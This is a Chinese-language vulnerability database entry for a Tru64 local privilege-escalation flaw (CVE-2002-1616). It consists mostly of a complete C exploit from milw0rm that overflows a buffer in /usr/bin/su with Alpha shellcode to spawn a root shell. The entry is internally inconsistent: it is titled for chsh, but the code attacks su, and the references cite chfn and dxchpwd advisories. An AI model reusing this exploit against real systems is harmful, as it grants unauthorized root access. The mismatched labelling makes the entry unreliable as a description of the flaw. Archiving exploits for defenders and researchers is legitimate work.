Tru64 chsh本地权限提升漏洞

Tru64 chsh本地权限提升漏洞

漏洞ID 1106191 漏洞类型 边界条件错误
发布时间 2001-01-26 更新时间 2005-10-20
图片[1]-Tru64 chsh本地权限提升漏洞-安全小百科CVE编号 CVE-2002-1616
图片[2]-Tru64 chsh本地权限提升漏洞-安全小百科CNNVD-ID CNNVD-200208-002
漏洞平台 Tru64 CVSS评分 7.2
|漏洞来源
https://www.exploit-db.com/exploits/259
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200208-002
|漏洞详情
Tru64是一款由HP公司开发的Unix操作系统,其中包含chsh工具可以用来更改当前用户相关信息。Tru64中的chsh工具存在漏洞,本地攻击者可以利用这个漏洞提升权限。部分HPTru64操作系统的chsh工具存在问题,允许非特权用户获得root用户权限。没有具体技术细节描述。
|漏洞EXP
/*      Copyright (c) 2000 ADM                                  */
/*      All Rights Reserved                                     */
/*      THIS IS UNPUBLISHED PROPRIETARY SOURCE CODE OF ADM      */
/*      The copyright notice above does not evidence any        */
/*      actual or intended publication of such source code.     */
/*                                                              */
/*      Title:        Tru64 5 su                                */
/*      Tested under: Tru64 5A  (OSF/1)                         */
/*      By:           K2  (thx horizon,lamont :)                */
/*      Use:          cc -o tru64-su tru64-su.c                 */
/*      Issues:       Tru64 re-implmented non-exec patch,       */
/*                    I'm working on non-exec alpha technique   */
/*                    so it will only work if,                  */
/*                    do this -> "sysconfig -q proc executable_stack" */
/*                    and see if -> "executable_stack = 1"      */
/*                    else?                                     */
/*                    wait for new alpha non-exec stack exploit */
/*                                                              */


#include <unistd.h>
#include <stdlib.h>
#include <strings.h>
#include <string.h>
#include <stdio.h>

#define BUFSIZE 8241
char *nop                               = "x1fx04xffx47";
char *retaddr                   = "xe4xc0xffx1fx01x00x00x00";

/* lamont's shellcode */

int rawcode[] = {
  0x2230fec4,              /* subq $16,0x13c,$17 [2000]*/
  0x47ff0412,              /* clr $18            [2000]*/
  0x42509532,              /* subq $18, 0x84     [2000]*/
  0x239fffff,              /* xor $18, 0xffffffff, $18 */
  0x4b84169c,
  0x465c0812,
  0xb2510134,              /* stl $18, 0x134($17)[2000]*/
  0x265cff98,              /* lda $18, 0xff978cd0[2000]*/
  0x22528cd1,
  0x465c0812,              /* xor $18, 0xffffffff, $18 */
  0xb2510140,              /* stl $18, 0x140($17)[2000]*/
  0xb6110148,              /* stq $16,0x148($17) [2000]*/
  0xb7f10150,              /* stq $31,0x150($17) [2000]*/
  0x22310148,              /* addq $17,0x148,$17 [2000]*/
  0x225f013a,              /* ldil $18,0x13a     [2000]*/
  0x425ff520,              /* subq $18,0xff,$0   [2000]*/
  0x47ff0412,              /* clr $18            [2000]*/
  0xffffffff,              /* call_pal 0x83      [2000]*/
  0xd21fffed,              /* bsr $16,$l1    ENTRY     */
  0x6e69622f,              /* .ascii "/bin"      [2000]*/
  /* .ascii "/sh" is generated */
};

int main(int argc, char **argv)
{
  char buf[BUFSIZE+4];
  char *env[2];
  char *cp,*rc;
  int i;

  if(argc > 1) retaddr[0]+=atoi(argv[1]);

  memset(&buf,'A',BUFSIZE-8);
  cp=(char *) &(buf[BUFSIZE-8]);

  for (i=0;i<8;i++)
    *cp++=retaddr[i];

  rc=(char *)rawcode;
  cp=buf;

  for(i=0;i<8;i++)
    *cp++ = 0x6e;

  for(i=0;i<72;i++)
    *cp++ = rc[i];
  for(i=0;i<320;i++)
    *cp++ = nop[i % 4];
  *cp++=rc[72]-80;
  for(i=1;i<8;i++)
    *cp++ = rc[i+72];

  env[1]=NULL;

  execle("/usr/bin/su","su",buf, NULL,env);
  return(0);
}


// milw0rm.com [2001-01-26]
|参考资料

来源:US-CERTVulnerabilityNote:VU#193347
名称:VU#193347
链接:http://www.kb.cert.org/vuls/id/193347
来源:US-CERTVulnerabilityNote:VU#671627
名称:VU#671627
链接:http://www.kb.cert.org/vuls/id/671627
来源:US-CERTVulnerabilityNote:VU#177067
名称:VU#177067
链接:http://www.kb.cert.org/vuls/id/177067
来源:US-CERTVulnerabilityNote:VU#137555
名称:VU#137555
链接:http://www.kb.cert.org/vuls/id/137555
来源:XF
名称:tru64-chfn-bo(10614)
链接:http://xforce.iss.net/xforce/xfdb/10614
来源:BID
名称:5382
链接:http://www.securityfocus.com/bid/5382
来源:BID
名称:5381
链接:http://www.securityfocus.com/bid/5381
来源:BID
名称:5380
链接:http://www.securityfocus.com/bid/5380
来源:HP
名称:SSRT2259
链接:http://archives.neohapsis.com/archives/tru64/2002-q3/0019.html
来源:XF
名称:tru64-dxchpwd-bo(11620)
链接:http://xforce.iss.net/xforce/xfdb/11620
来源:BID
名称:5379
链接:http://www.securityfocus.com/bid/5379
来源:BUGTRAQ
名称:20020902HappyLaborDayfromSnosoft
链接:http://www.securityfocus.com/archive/1/290115
来源:www.blacksheepnetworks.com
链接:http://www.blacksheepnetworks.com/security/ha

相关推荐: Multiple Linux vendor imwheel Vulnerability

Multiple Linux vendor imwheel Vulnerability 漏洞ID 1104253 漏洞类型 Boundary Condition Error 发布时间 2000-03-13 更新时间 2000-03-13 CVE编号 N/A C…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享